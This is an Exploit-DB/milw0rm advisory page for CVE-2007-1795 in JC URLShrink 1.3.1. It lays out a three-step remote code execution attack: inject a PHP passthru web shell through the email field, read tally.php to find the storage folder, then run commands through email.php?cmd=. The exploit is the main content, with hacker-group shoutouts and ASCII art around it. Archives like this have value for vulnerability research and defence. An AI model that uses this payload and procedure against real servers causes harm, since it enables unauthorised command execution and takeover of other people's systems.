Exploit JC URLShrink 1.3.1 - Remote Code Execution

[Exploiter]

EDB-ID

3611

Проверка EDB

1. Пройдено

Автор

DJ7XPL

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-1795

Дата публикации

2007-03-30

                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
+
+                            /*************************__I N F O__**************************\
+			     |*                                                            *|
+                            |*                     U R L S H R I N K                      *|
+                            |*                                                            *|
+                            |*  Portal:    Urlshrink                                      *|
+                            |*  Version:   1.3.1                                          *|
+			     |*  Release:   26-07-2006                                     *|
+                            |*  www:       www.developers.jccorp.net                      *|
+                            |*  Author:    Dj7xpl  | [email protected]                     *|
+                            |*                                                            *|
+                            \**************************************************************/
+_______________________________________________________________________________________________________________________+



+________________________________________________________E X P L O I T__________________________________________________+
+
+
+                         E X P L O I T - -
+                         --------------
+
+                               1) Insert Bad Code
+							
+					[X] Enter Your URL to shrink:   (Enter Random Url)  E.g : milw0m.com
+					[X] Enter your Email Address:   (Enter Bad Code)    E.g : <?php passthru($_GET[cmd]);?> 
+					
+					
+					
+			        2) See Folder Name
+
+					[X] http://[Target]/[Path]/data/tally.php
+					[X] http://localhost/urlshrink/data/tally.php       E.g : 5
+					
+					
+					
+			        3) Visit Your Code
+					
+					[X] http://localhost/urlshrink/[Folder Name]/email.php  
+					    E.g : http://localhost/urlshrink/5/email.php?cmd=ls -la 
+
+
+		                  
+					
+_______________________________________________________________________________________________________________________+


+___________________________________________________________T N X_______________________________________________________+
+
+
+          Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org, Simorgh .............
+		   
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-30]